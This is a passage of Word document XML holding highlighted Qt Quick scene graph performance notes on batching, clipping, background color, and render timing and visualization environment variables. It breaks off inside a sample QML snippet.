        <w:t xml:space="preserve">Instead of clipping text, use </w:t>
      </w:r>
      <w:r w:rsidRPr="005846EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eliding</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="005846EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Instead of clipping an image, create a</w:t>
      </w:r>
      <w:r w:rsidR="005846EB" w:rsidRPr="005846EB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2086" w:history="1">
        <w:r w:rsidRPr="005846EB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickImageProvider</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="005846EB" w:rsidRPr="005846EB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005846EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>that returns a cropped image</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00815754" w:rsidRDefault="00815754" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005846EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Batching only works for </w:t>
      </w:r>
      <w:r w:rsidRPr="005846EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>16-bit indices</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="005846EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>All built-in items use 16-bit indices</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, but </w:t>
      </w:r>
      <w:r w:rsidRPr="005846EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">custom geometry is free to also use </w:t>
      </w:r>
      <w:r w:rsidRPr="005846EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>32-bit indices</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00815754" w:rsidRDefault="00815754" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005846EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Some material flags prevent batching</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the most limiting one being</w:t>
      </w:r>
      <w:r w:rsidR="005846EB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2087" w:anchor="Flag-enum" w:history="1">
        <w:r w:rsidRPr="005846EB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGMaterial::RequiresFullMatrix</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="005846EB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>which prevents all batching.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00815754" w:rsidRDefault="00815754" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Applications with a </w:t>
      </w:r>
      <w:r w:rsidRPr="005846EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>monochrome background</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC420B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>should set it using</w:t>
      </w:r>
      <w:r w:rsidR="005846EB" w:rsidRPr="00BC420B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2088" w:anchor="color-prop" w:history="1">
        <w:r w:rsidRPr="00BC420B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow::setColor</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BC420B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() rather than using a top-level Rectangle item.</w:t>
      </w:r>
      <w:r w:rsidR="005846EB" w:rsidRPr="00BC420B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2089" w:anchor="color-prop" w:history="1">
        <w:r w:rsidRPr="00BC420B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow::setColor</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BC420B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> w</w:t>
      </w:r>
      <w:r w:rsidRPr="005846EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ill be used in a call to</w:t>
      </w:r>
      <w:r w:rsidR="005846EB" w:rsidRPr="005846EB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005846EB">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>glClear()</w:t>
      </w:r>
      <w:r w:rsidRPr="005846EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, which is potentially faster</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00815754" w:rsidRDefault="00815754" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005846EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mipmapped Image items</w:t>
      </w:r>
      <w:r w:rsidRPr="005846EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> are not placed in global atlas and will not be batched</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="005846EB" w:rsidRDefault="00815754" w:rsidP="00815754">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005846EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If an application performs poorly, make sure that rendering is actually the bottleneck. Use a profiler! The environment variable</w:t>
      </w:r>
      <w:r w:rsidR="005846EB" w:rsidRPr="005846EB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005846EB">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QSG_RENDER_TIMING=1</w:t>
      </w:r>
      <w:r w:rsidR="005846EB" w:rsidRPr="005846EB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005846EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>will output a number of useful timing parameters which can be useful in pinpointing where a problem lies</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005846EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DE5C7D" w:rsidRPr="00DE5C7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="005846EB" w:rsidRPr="00DE5C7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Debugging of rendering. It is very important.</w:t>
      </w:r>
      <w:r w:rsidR="00DE5C7D" w:rsidRPr="00DE5C7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00815754" w:rsidRDefault="00815754" w:rsidP="00DE5C7D">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1740" w:name="visualizing"/>
      <w:bookmarkStart w:id="1741" w:name="_Toc483000907"/>
      <w:bookmarkStart w:id="1742" w:name="_Toc483003898"/>
      <w:bookmarkStart w:id="1743" w:name="_Toc483604251"/>
      <w:bookmarkStart w:id="1744" w:name="_Toc483605471"/>
      <w:bookmarkEnd w:id="1740"/>
      <w:r w:rsidRPr="00DE5C7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Visualizing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1741"/>
      <w:bookmarkEnd w:id="1742"/>
      <w:bookmarkEnd w:id="1743"/>
      <w:bookmarkEnd w:id="1744"/>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To visualize the various aspects of the scene graph's default renderer, the</w:t>
      </w:r>
      <w:r w:rsidR="00C04074">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C04074">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QSG_VISUALIZE</w:t>
      </w:r>
      <w:r w:rsidR="00C04074">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>environment variable can be set to one of the values detailed in each section below. We provide examples of the output of some of the variables using the following QML code:</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</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2.2</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</w:t>
      </w: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width</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200</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height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140</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ListView</w:t>
      </w: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id</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clippedList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x</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20</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y</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20</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width</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70</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height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100</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clip</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        model</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r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Item A"</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Item B"</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
